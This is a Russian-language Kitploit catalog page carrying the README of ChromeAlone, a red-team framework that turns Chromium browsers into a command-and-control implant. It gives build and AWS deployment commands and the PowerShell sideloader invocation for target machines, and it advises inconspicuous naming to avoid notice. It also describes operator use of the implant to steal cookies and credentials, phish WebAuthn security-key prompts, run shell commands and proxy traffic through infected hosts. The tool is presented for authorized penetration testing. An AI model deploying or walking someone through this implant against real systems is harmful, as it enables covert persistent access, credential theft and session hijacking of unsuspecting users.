Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ChromeAlone — Инструмент для преобразования браузеров Chromium в C2-имплант | Kitploit
Инструменты/GitHubGitHub/praetorian-inc/chromealone
Повышение привилегийМеханизмы персистентностиЭксплуатация веб-приложенийПост-эксплуатацияФишингКомандование и УправлениеСоциальная инженерияRed TeamingРазработка Полезной Нагрузки
GitHubpraetorian-inc/chromealone

ChromeAlone

Инструмент для преобразования браузеров Chromium в C2-имплант

59676510 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

ChromeAlone - Фреймворк C2 для браузера

Architecture Diagram

Что это даёт?

ChromeAlone — это браузерный имплант, который можно использовать вместо обычных имплантов, таких как Cobalt Strike или Meterpreter. Этот репозиторий предоставляет простой процесс сборки, который создаёт консоль управления, развёртывает инфраструктуру и генерирует скрипт загрузчика PowerShell для запуска на целевых машинах.

После установки каждый имплант ChromeAlone предоставляет механизмы для:

  • Предоставление SOCKS TCP-прокси на хосте
  • Кража сессий браузера и захват учётных данных
  • Запуск исполняемых файлов на хосте из Chrome
  • Фишинг запросов WebAuthn для физических токенов безопасности, таких как YubiKeys или Titan Security Keys.
  • Устойчивая к EDR форма персистентности на хосте, реализованная исключительно с помощью встроенных возможностей Chromium.

Инструкции по сборке

Сначала соберите docker-контейнер: docker build -t chromealone .

Инструкции по развёртыванию

В настоящее время поддерживаются два режима развёртывания. Обратите внимание, что в обоих случаях docker следует запускать из корневого каталога git-репозитория ChromeAlone.

Развёртывание с нуля через AWS

Для этого вам потребуется учётная запись AWS, настроенная с вашими учётными данными, сохранёнными в ~/.aws/credentials. Убедитесь, что ваша учётная запись имеет полные права на запись EC2, а также разрешения Route53. Кроме того, предполагается, что ваш Route53 настроен как минимум с одной хостинг-зоной, содержащей зарегистрированный домен. Если эти условия выполнены, вы можете выполнить следующую команду.

root@kitploit:~
docker run --rm -v $(pwd):/project -v ~/.aws:/root/.aws chromealone --domain=sendmea.click --appname=UpdateService --region=us-west-2

Значение domain должно соответствовать домену, находящемуся под управлением вашей настройки Route53. appname может быть любым значением на ваше усмотрение и будет использоваться для именования нескольких ключей реестра и папок на диске при развёртывании. Рекомендуется использовать довольно безобидное имя, например UpdateService или что-то столь же незаметное. Обратите внимание, что region необязателен и по умолчанию будет установлен us-east-2, если не указан.

Это развернёт релейный сервер BATTLEPLAN в AWS и сгенерирует следующие артефакты:

output/client — веб-приложение управления для администрирования ваших установок ChromeAlone.

output/sideloader.ps1 — установочный скрипт для запуска на целевых машинах для заражения их локального экземпляра браузера. ПРИМЕЧАНИЕ: Также будет файл iwa-sideloader.ps1 для загрузки ТОЛЬКО изолированного веб-приложения и extension-sideloader.ps1 для загрузки ТОЛЬКО расширения браузера.

output/extension — сгенерированное вредоносное расширение браузера.

output/iwa — сгенерированный подписанный пакет вредоносного изолированного веб-приложения.

output/relay-deployment — артефакты Terraform от вашего развёртывания AWS, включая SSH-ключ для прямого доступа к хосту.

Генерация скриптов развёртывания из существующего развёртывания сервера

Если вы уже развернули экземпляр, output/relay-deployment/terraform.tfvars будет содержать всю информацию, необходимую для генерации новых скриптов загрузчика и вредоносных расширений. Вы можете указать Docker-файлу ChromeAlone на файл tfvars, и он пропустит этап развёртывания, сохраняя соответствующие метаданные для обработки соединений.

Запустите сборочный скрипт docker run --rm -v $(pwd):/project -v ~/.aws:/root/.aws chromealone --tfvars=/project/path/to/terraform.tfvars --appname=UpdateService, и он сгенерирует новый вредоносный загрузчик для вашего развёртывания.

Установка на хостах

Возьмите sideloader.ps1 и выполните его на целевой машине с Windows 10 или Windows 11, запустив powershell.exe ExecutionPolicy Bypass -File .\path\to\sideloader.ps1. Обратите внимание, что вы можете запускать с дополнительными флагами, если хотите установить хост NativeMessaging (требуется для выполнения команд) или принудительно перезапустить Chrome (необходимо, если вы хотите, чтобы расширение запустилось сразу после выполнения этого скрипта, а не при следующем открытии Chrome пользователем). Пример вызова с обоими флагами: powershell.exe -ExecutionPolicy Bypass .\sideloader.ps1 -InstallNativeMessagingHost $true -ForceRestart $true. Вы также можете изменить значения по умолчанию в начале скрипта с false на true, если хотите, чтобы эти флаги использовались автоматически.

Полное выполнение скрипта займёт примерно 20–30 секунд.

Инструкции для оператора

После загрузки ChromeAlone вы можете просмотреть все подключённые хосты, открыв output/client/index.html. Это веб-приложение будет предварительно настроено на подключение к вашему развёрнутому экземпляру релея BATTLEPLAN. Обратите внимание, что по умолчанию релей защищён брандмауэром и разрешает входящий доступ управления только на портах 1080–1181 с IP-адреса, который развернул сервер. Если вы хотите изменить это, вам нужно обновить сетевые настройки EC2-экземпляра, чтобы включить дополнительные машины.

Большинство команд можно выполнять из веб-интерфейса, включая:

  • Дамп истории и cookie (через раздел Quick Commands, что требует выбора целевого агента в разделе Execute Command)
  • Захват учётных данных (они появятся на вкладке Captured Data)
  • Принудительные запросы WebAuthn (через раздел Execute Command)
  • Чтение файловой системы (через вкладку File Browser)
  • Выполнение команд оболочки (через вкладку Interactive Shell)

Основным исключением является SOCKS-проксирование. Каждому заражённому хосту назначается уникальный SOCKS-порт для сервера, который можно увидеть в разделе Agent Information, где у каждого агента есть поле Port. Назначенный порт в сочетании с учётными данными admin, хранящимися в output/client/config.js, можно использовать для настройки прокси SOCKS для конкретного хоста.

Например, предположим, у нас есть агент с портом 1081, наш домен — chrome.alone, имя пользователя — admin (всегда так), а пароль — thisisnotarealpassword. Вот несколько примеров использования:

root@kitploit:~
proxychains -q socks5 admin:[email protected]:1081 curl http://ifconfig.me
xfreerdp /cert:ignore /v:<target RDP host> /u:<target RDP username> /proxy:socks5://admin:[email protected]:1081
curl -x socks5h://chrome.alone:1081 -u "admin:thisisnotarealpassword" http://ifconfig.me

Что в этом репозитории?

Репозиторий ChromeAlone разбит на компоненты, многие из которых могут использоваться по отдельности в рамках оценки, но вместе они представляют собой полный инструментарий для создания имплантов в браузер Chromium.

  • BATTLEPLAN — это компонент сервера управления в инструментарии. Он содержит скрипты Terraform для развёртывания в среде AWS, а также HTML-клиент для взаимодействия с сервером после развёртывания.
  • BLOWTORCH — это вредоносное изолированное веб-приложение, которое использует разрешения Direct Socket для реализации прокси SOCKS TCP и WebSocket-сервера, обеспечивая связь между другими компонентами Chrome. Оно также служит мостом обмена сообщениями обратно к релейному серверу BATTLEPLAN.
  • DOORKNOB — это серия скриптов, используемых для генерации загрузчиков PowerShell для изолированных веб-приложений и расширений Chrome. Скрипт в build.sh показывает пример создания единого установочного скрипта PowerShell, который объединяет оба этих отдельных загрузчика в один.
  • HOTWHEELS — это вредоносное расширение Chrome, которое реализует все свои возможности в Web Assembly. Оно предоставляет подавляющее большинство функций ChromeAlone для захвата учётных данных, перехвата сессий, выполнения команд и чтения файловой системы.
  • PAINTBUCKET — серия скриптов содержимого, которые позволяют фишинговать запросы WebAuthn, скрывая дополнительные запросы WebAuthn внутри iFrame в неактивных вкладках всякий раз, когда происходит обычный запрос WebAuthn.

Кто это создал?

Этот инструмент написан Майком Вебером из Praetorian Security.

Ссылки

Эта работа стоит на плечах многих других исследовательских инструментов и статей в блогах, которые внесли свой вклад в эту область. Без их работы этот проект не существовал бы. Если вы хотите глубже изучить внутренние механизмы, которые использует этот проект, я предлагаю прочитать следующие материалы:

  • Silent Chrome - https://github.com/asaurusrex/Silent_Chrome
  • Return of the Extension - https://syntax-err0r.github.io/Return_Of_The_Extension.html
  • CursedChrome - https://github.com/mandatoryprogrammer/CursedChrome
  • https://www.adlice.com/google-chrome-secure-preferences/
  • Browser Extension Supply Chain Attacks - https://www.darktrace.com/blog/cyberhaven-supply-chain-attack-exploiting-browser-extensions
  • LummaC2 Sideloading - https://www.esentire.com/blog/lummac2-malware-and-malicious-chrome-extension-delivered-via-dll-side-loading
  • BlinkOn 19 - https://www.youtube.com/watch?v=Q3b5NB-7HQQ
  • RedExt - https://github.com/Darkrain2009/RedExt
  • Browser Syncjacking - https://labs.sqrx.com/browser-syncjacking-cc602ea0cbd0
  • Isolated Web Apps Explainer - https://github.com/WICG/isolated-web-apps
  • LevelDB Writeup - https://www.cclsolutionsgroup.com/post/hang-on-thats-not-sqlite-chrome-electron-and-leveldb
  • DirectSockets Explainer - https://wicg.github.io/direct-sockets/
  • WebUSB Yubikey Phishing - https://www.wired.com/story/chrome-yubikey-phishing-webusb/
  • Offensive Browser Extension Development - https://www.irongeek.com/i.php?page=videos/derbycon8/track-4-02-offensive-browser-extension-development-michael-weber

Лицензия

ChromeAlone лицензирован в соответствии с Apache License, Version 2.0.

root@kitploit:~
Copyright 2025 Praetorian Security, Inc

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Скачать инструмент